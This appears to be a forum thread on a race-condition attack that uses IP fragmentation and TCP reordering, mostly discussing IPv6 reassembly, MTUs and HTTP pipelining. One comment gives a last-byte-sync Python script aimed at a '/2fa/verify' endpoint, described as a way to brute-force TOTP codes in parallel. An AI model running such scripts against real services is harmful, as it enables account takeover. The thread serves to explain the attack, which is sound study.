It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to reassemble packets of up to 1500 bytes, so sending a 65 KB TCP segment is quite likely to just result in dropped packets.
Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4 GiB in size (so-called "jumbograms", enabled by an additional hop-by-hop header), though I think it would be truly hard to find any network which uses this feature.
> Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link.
The two concepts are completely independent and orthogonal. You can have a 1280 byte link MTU on a device which happily reassembles 9x fragments into a 9000 byte payload. You can also have another device with a 9000 byte link MTU which refuses to reassemble 2x 1280 byte fragments into a single 2000 byte packet simply because it doesn't have to. Both devices are IPv6 compliant.
Well, I suppose there is one causal relationship between link-layer MTU and IPv6 fragmentation: "how much bigger than 1280 bytes can the individual fragments be".
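To make that concrete, here's a minimal scapy sketch (addresses and sizes are made up): an 8000-byte payload gets split into fragments that each fit a 1280-byte link MTU, while whether the far end is willing to reassemble more than 1500 bytes remains entirely its own business.

    # Minimal sketch (Python + scapy), hypothetical addresses: fragment one
    # oversized payload so each fragment fits an assumed 1280-byte link MTU.
    # The receiver is only obliged to reassemble up to 1500 bytes.
    from scapy.all import IPv6, IPv6ExtHdrFragment, UDP, Raw, fragment6, send

    big = (IPv6(dst="2001:db8::1")            # documentation-prefix address
           / IPv6ExtHdrFragment()             # placeholder telling fragment6 where to split
           / UDP(sport=4000, dport=4000)
           / Raw(b"A" * 8000))                # 8000-byte payload, well past 1500

    frags = fragment6(big, 1280)              # each fragment sized for a 1280-byte link MTU
    print(len(frags), "fragments")
    # send(frags)                             # needs raw-socket privileges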
Oh, yes, what I meant to say is that you can send frames larger than 1500 bytes without resorting to IP fragmentation, in certain networks. I can see how it sounded like the "1500 limit" was the IPv6 reassembly limit, but I wanted to refer to the 1500 limit for a single frame.
Indeed. If the attack works by exploiting (reliable) TCP re-ordering algorithms in the server then why also bother with (unreliable) IP fragmentation? Just send a larger number of out-of-order TCP packets, surely?
The article says the attack was more successful when using IP fragmentation in conjunction with TCP reordering. Probably the fragments and the out-of-order segments sit in two separate memory areas with independent limits, which lets you stage more data in the stack.
Two techniques, even: more requests processed at once, starting from a very precisely user-controlled (bandwidth-adjusted) point in time.
One helps with race conditions in the server, the other helps when racing third-party requests. Sending a single highly efficient "go" packet for many HTTP requests is sure to ruin the fun for everyone else awaiting some pre-announced concert-ticket or GPU sale to open.
If the website's accounting is merely "eventually consistent" between threads/servers and you are able to fire many (large) requests at a precise point in time (determined by a small packet), both techniques work in tandem: you could have (one of) your posts appear with repeating digits (such as at https://news.ycombinator.com/item?id=42000000) instead of just seeing "Sorry, we're not able to serve your requests this quickly."
I think it's ultimately about bypassing TOTP 2FA by exploiting a race condition in the authentication-failure backoff timer to submit thousands of possible codes simultaneously. The technique abuses the TCP stack and IP fragmentation to load the server's network stack with as much data as possible before hitting it with a "go" packet that completes the fragments at the head of the line-blocked data buffer and spills all of its contents into the webserver before a single RTT can complete.
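For a feel of the "go" idea without the fragmentation part, the classic application-level last-byte sync does something similar: hold back the final byte of many requests and release them all at once. A rough sketch (host, path and code are made up, and in a real attempt you'd vary the code per connection):

    # Simplified last-byte-sync sketch (hypothetical host/path): the server
    # buffers each almost-complete request, then all of them are released in
    # one tight loop. This only approximates the fragment/reorder trick above.
    import socket

    HOST, PORT, N = "target.example", 80, 30   # made-up target, 30 parallel attempts

    body = "code=123456"
    req = (f"POST /2fa/verify HTTP/1.1\r\n"
           f"Host: {HOST}\r\n"
           f"Content-Type: application/x-www-form-urlencoded\r\n"
           f"Content-Length: {len(body)}\r\n"
           f"Connection: close\r\n\r\n{body}").encode()

    socks = []
    for _ in range(N):
        s = socket.create_connection((HOST, PORT))
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        s.sendall(req[:-1])                    # everything except the last byte
        socks.append(s)

    for s in socks:                            # the "go" moment: release the last bytes
        s.send(req[-1:])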
Many real-world web applications “shockingly” don’t guarantee ACID-style transactional state updates, and thus are vulnerable to race conditions.
Suppose (for instance) that the application tier caches user session information by some internal, reused ID.
If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.
But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.
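A toy sketch of that window (names invented): the reused ID becomes visible before the new session's data is written, so a concurrent lookup in between returns the previous owner's data.

    # Toy illustration (invented names): the recycled session ID is handed out
    # before the new session's data is written, so a lookup in that window
    # still returns the previous owner's data.
    import threading, time

    free_ids = [17]                        # a previously used session ID back in rotation
    sessions = {17: {"user": "alice"}}     # stale entry left over from the old session

    def create_session(user):
        sid = free_ids.pop()               # step 1: ID reserved and visible
        time.sleep(0.001)                  # the "few microseconds" gap
        sessions[sid] = {"user": user}     # step 2: data populated
        return sid

    def racing_request(sid):
        print("racer sees:", sessions.get(sid))   # can print alice's data, not bob's

    writer = threading.Thread(target=create_session, args=("bob",))
    racer = threading.Thread(target=racing_request, args=(17,))
    writer.start(); racer.start()
    writer.join(); racer.join()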
I assume with HTTP/1.1 this would be less useful, since each synchronized request would require another socket, thus hitting potential firewalls limiting SYN/SYN-ACK rate and/or concurrent connections from the same IP.
In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.
You can pipeline requests on http/1.1. But most servers handle one request at a time, and don't read the next request until the current request's response is finished. (And mainstream browsers don't typically issue pipelined requests on http/1.1, IIRC)
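For reference, pipelining is just not waiting for a response before writing the next request (example.com and the paths are placeholders):

    # Minimal HTTP/1.1 pipelining sketch (example.com / paths are placeholders):
    # both requests go out back-to-back; a compliant server answers them in order.
    import socket

    s = socket.create_connection(("example.com", 80))
    s.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
              b"GET /robots.txt HTTP/1.1\r\nHost: example.com\r\n"
              b"Connection: close\r\n\r\n")

    chunks = []
    while (data := s.recv(4096)):
        chunks.append(data)
    print(b"".join(chunks)[:200])    # two responses, back to back, in request order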
If you have a connection per request, and you need 1000 requests to be 'simultaneous', you've got to get a 1000-packet burst to arrive closely packed, and that's a lot harder than this method (or a similar method suggested in comments: sending unfragmented TCP packets out of order, so that when the first packet of the sequence is received, the rest of the packets are already there).
It's less that the socket is bidirectional, and more that most requests have an unambiguous end. A pipeline-naive server with Connection: keep-alive is going to read the current request until the end, send a response, and then read from there. You don't have to wait for the response to send the next request; and you'll get better throughput if you don't.
Some servers do some really wacky stuff if you pipeline requests, though. The RFC is clear: the server should respond to each request one at a time, in order. However, some servers choose not to --- I've seen out-of-order responses, interleaved responses, as well as server errors in response to pipelined requests. That's one of the reasons browsers don't tend to do it.
You also rightfully bring up the question of what to do if the connection is closed and your request has no response. IMHO, if you got Connection: Close in a response, that's an unambiguous case --- the server told you, when serving response N, that it won't send any more responses, and I think it's safe to resend any N+1 requests, since the server knows you won't get the response and so it shouldn't process those requests. It's less clear when the connection is closed without explicit signalling --- the server may be processing the requests and you don't know. http/2 provides for an explicit close (GOAWAY) that tells you the last request it saw, which addresses this; on http/1.1, when the server closes unexpectedly, it's not clear. That often happens when the connection is idle.
An HTTP/1.1 server may send hints about how many requests until it closes the connection (which would be explicit), as well as the idle timeout (in seconds). But it's still not fun when you send a request and you receive a TCP close, and you have to guess if the server closed before it got the request (you should resend) or after (your request crashed the server, and you probably shouldn't resend).
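Those hints ride on the (non-standard but widely implemented) Keep-Alive response header, if the server bothers to send it at all; e.g., with Python's http.client (example.com is a placeholder):

    # Reading the connection-lifetime hints, if the server sends them at all
    # (example.com is a placeholder; many servers omit the Keep-Alive header).
    import http.client

    conn = http.client.HTTPConnection("example.com")
    conn.request("GET", "/")
    resp = conn.getresponse()
    resp.read()
    print(resp.getheader("Connection"))   # "keep-alive" or "close"
    print(resp.getheader("Keep-Alive"))   # e.g. "timeout=5, max=100", or None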
Some servers didn't support it, most did though. Which was why when the first HTTP2 tech demos came out, I really couldn't see the enormous speedups people were trying to demo.
It's probably a reference to the news article about WhatsApp increasing the maximum group size to 256 and a journalist pondering why such a specific number was chosen. OP probably meant it in a similar sense: why was 65535 chosen (but it's not really such a mystery).